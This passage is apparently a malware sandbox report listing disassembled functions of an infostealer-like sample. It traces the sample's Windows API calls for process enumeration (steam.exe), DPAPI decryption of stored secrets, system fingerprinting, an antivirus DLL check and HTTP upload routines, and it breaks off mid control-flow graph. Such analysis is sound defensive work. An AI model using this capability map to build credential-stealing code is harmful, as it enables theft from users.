                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                              • String ID: steam.exe
                                                                                                                                                                              • API String ID: 1799959500-2826358650
                                                                                                                                                                              • Opcode ID: a97b527bbbf29c8cebefd93357777e65eba9b73a3fbef0a6b4ca914fdf2de7a3
                                                                                                                                                                              • Instruction ID: 1773a9f44fc34aaac05bf3aea6492cef560a17b0bd3ba204b2d7e14d6521c49c
                                                                                                                                                                              • Opcode Fuzzy Hash: a97b527bbbf29c8cebefd93357777e65eba9b73a3fbef0a6b4ca914fdf2de7a3
                                                                                                                                                                              • Instruction Fuzzy Hash: 6A011A709412389FEB619F64CD94BDEB6B8AB09320F4001D5A909E2290EF34CB84CF20
                                                                                                                                                                              Function 02A10DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,02A3670D,?,?), ref: 02A10E0C
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 02A10E1A
                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A10E28
                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A10E57
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02A10EFF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                              • String ID: /
                                                                                                                                                                              • API String ID: 507856799-4001269591
                                                                                                                                                                              • Opcode ID: 159fde44a2777427c04c51c1442cdf3419a29c675fe3dc1bc59a970812f5308f
                                                                                                                                                                              • Instruction ID: 241d0d188647d3870a74967d019b5d01e9edbac315effceb6d9f10476f1f95ec
                                                                                                                                                                              • Opcode Fuzzy Hash: 159fde44a2777427c04c51c1442cdf3419a29c675fe3dc1bc59a970812f5308f
                                                                                                                                                                              • Instruction Fuzzy Hash: D63149B5D80228AFDB20AF64DD88B9EB3B9BB04310F5045E5E919B3151DB74AEC58F60
                                                                                                                                                                              Function 02A1257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 02A12589
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,02A17E31,.exe,02A36CCC,02A36CC8,02A36CC4,02A36CC0,02A36CBC,02A36CB8,02A36CB4,02A36CB0,02A36CAC,02A36CA8,02A36CA4), ref: 02A125A8
                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02A125B8
                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02A125CA
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A125DC
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A125F0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1799959500-0
                                                                                                                                                                              • Opcode ID: a00af5c36663d61cd5914654ae8bfa609a81cf075548c3627f4969b3682da7fe
                                                                                                                                                                              • Instruction ID: 1064419eba32fbc9ff569d0298161150087c8315afb5e8fa1ba0b44b74442e0a
                                                                                                                                                                              • Opcode Fuzzy Hash: a00af5c36663d61cd5914654ae8bfa609a81cf075548c3627f4969b3682da7fe
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E011D319412349FE7219B648D98FEAB6BC9B19351F8405D5E90DE2241EF38CB949B21
                                                                                                                                                                              Function 02A080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A0823B), ref: 02A080C4
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,02A0823B,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080D8
                                                                                                                                                                              • LocalFree.KERNEL32(02A0CB95,?,?,02A0823B,02A0CB95,?,?,?,?,?,?,?,02A0CC90,?,?), ref: 02A080FD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                              • String ID: DPAPI
                                                                                                                                                                              • API String ID: 2068576380-1690256801
                                                                                                                                                                              • Opcode ID: a5aa100e3048f30a3ba177e3cb88108c2a6c71234252eb5565721b7e70d89128
                                                                                                                                                                              • Instruction ID: 7a80660cf8511ccecd2c468c398729a27d35ef3fca2271bcf24dda36213b1e6e
                                                                                                                                                                              • Opcode Fuzzy Hash: a5aa100e3048f30a3ba177e3cb88108c2a6c71234252eb5565721b7e70d89128
                                                                                                                                                                              • Instruction Fuzzy Hash: 14012CB5A01228EFCB00DFA8D88499EBBB9FF48314B108565E906E7341D7709F50CB90
                                                                                                                                                                              Function 02A114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,02A36712,?,?), ref: 02A114D4
                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 02A114E4
                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02A11542
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A1154D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 907984538-0
                                                                                                                                                                              • Opcode ID: 55dee9d78299a6671d7f693eb052ed6d31f57c09c0236594fa649106a63fe09a
                                                                                                                                                                              • Instruction ID: 0ede103db416d08d6ae82bd4292f6c46c92943163324b6a0649bea2db25b42c5
                                                                                                                                                                              • Opcode Fuzzy Hash: 55dee9d78299a6671d7f693eb052ed6d31f57c09c0236594fa649106a63fe09a
                                                                                                                                                                              • Instruction Fuzzy Hash: EC117075A80228ABD711AB649D84BEE73A9AB48720F400595ED0AB7240DF74EE858F60
                                                                                                                                                                              Function 02A10D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A10D49
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10D50
                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 02A10D5F
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A10D7D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3317088062-0
                                                                                                                                                                              • Opcode ID: b692ee9abc3009aedea694848ad52efb6aff14ab7f919321b1698ee48f9d04c2
                                                                                                                                                                              • Instruction ID: 4fd19417f3693a0a42ef6cdf8bc23cb745dd46d542ed5ccd2c9ec1731761cdce
                                                                                                                                                                              • Opcode Fuzzy Hash: b692ee9abc3009aedea694848ad52efb6aff14ab7f919321b1698ee48f9d04c2
                                                                                                                                                                              • Instruction Fuzzy Hash: ADF0B470A41338ABE7009F74AC49BAB37A9AB04725F100795F516E61C0DF70EE958A85
                                                                                                                                                                              Function 02A10C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013B9), ref: 02A10C5F
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10C66
                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,02A013B9), ref: 02A10C7A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1296208442-0
                                                                                                                                                                              • Opcode ID: 38abf076ea0a0b84a080fd2e19756aa794c371036328cd0aff94ef5f290b328e
                                                                                                                                                                              • Instruction ID: a8b35a1ffa9290f0141b69f0b563d1b4ba2785b25d99ea3365c0a2c6580e9838
                                                                                                                                                                              • Opcode Fuzzy Hash: 38abf076ea0a0b84a080fd2e19756aa794c371036328cd0aff94ef5f290b328e
                                                                                                                                                                              • Instruction Fuzzy Hash: 08D05BB5640204BBD74057D5DC4DE8E77BCD785715F000455F646D2140DDF0D9458730
                                                                                                                                                                              Function 02A10FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                              • Opcode ID: 2f5e487cc846b4d65e3f8153e0749b553d9c8b2523cef18a7a4433e09b1b73d0
                                                                                                                                                                              • Instruction ID: 4b55bd0b63b4b96684a9f1757970d54cc28dda13ebb8db54be12ee5711d37edf
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f5e487cc846b4d65e3f8153e0749b553d9c8b2523cef18a7a4433e09b1b73d0
                                                                                                                                                                              • Instruction Fuzzy Hash: FAE06D70D5021DABCB01DFA0EC45A9E77FCAB08604F4009A5A506E2180DA70EB998F44
                                                                                                                                                                              Function 02A014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?,?,?,?,?,02A01503,avghookx.dll,02A18544), ref: 02A014DF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcmpi
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1586166983-0
                                                                                                                                                                              • Opcode ID: be2460e9b5e629b8ce867826505a71b6c20ba0349bc67bd625b3643fababaaaf
                                                                                                                                                                              • Instruction ID: b65489ae0c811b0da7d046a0dc5fd880d3fa326e11074ce57b665e6dfa79909a
                                                                                                                                                                              • Opcode Fuzzy Hash: be2460e9b5e629b8ce867826505a71b6c20ba0349bc67bd625b3643fababaaaf
                                                                                                                                                                              • Instruction Fuzzy Hash: 42F08C72A00150EBCF20CF59E844FEAFBB8EB43764F156054E809B3250CB31ED21DA98
                                                                                                                                                                              Function 02A05482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 29 2a05482-2a05593 call 2a104e7 call 2a10519 call 2a04ab6 call 2a11e5d lstrlen call 2a11e5d call 2a104e7 * 4 StrCmpCA 48 2a05595 29->48 49 2a0559b-2a055a1 29->49 48->49 50 2a055a3-2a055b8 InternetOpenA 49->50 51 2a055be-2a056ce call 2a11c4a call 2a105c7 call 2a1058d call 2a02920 * 2 call 2a10609 call 2a105c7 call 2a10609 call 2a1058d call 2a02920 * 3 call 2a10609 call 2a105c7 call 2a1058d call 2a02920 * 2 InternetConnectA 49->51 50->51 52 2a05e64-2a05eec call 2a02920 * 4 call 2a10519 call 2a02920 * 3 50->52 51->52 118 2a056d4-2a05712 HttpOpenRequestA 51->118 86 2a05eee-2a05f2e call 2a02920 * 6 call 2a1d016 52->86 119 2a05e58-2a05e5e InternetCloseHandle 118->119 120 2a05718-2a0571e 118->120 119->52 121 2a05720-2a05736 InternetSetOptionA 120->121 122 2a0573c-2a05d77 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a105c7 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 call 2a10609 call 2a1058d call 2a02920 lstrlen * 2 GetProcessHeap RtlAllocateHeap lstrlen call 2a27050 lstrlen call 2a27050 lstrlen * 2 call 2a27050 lstrlen HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 2a05db5-2a05dc5 call 2a11afd 122->309 310 2a05d79-2a05db0 call 2a104e7 call 2a02920 * 3 122->310 316 2a05dcb-2a05dd0 309->316 317 2a05f2f 309->317 310->86 319 2a05e11-2a05e2e InternetReadFile 316->319 321 2a05e30-2a05e43 StrCmpCA 319->321 322 2a05dd2-2a05dda 319->322 324 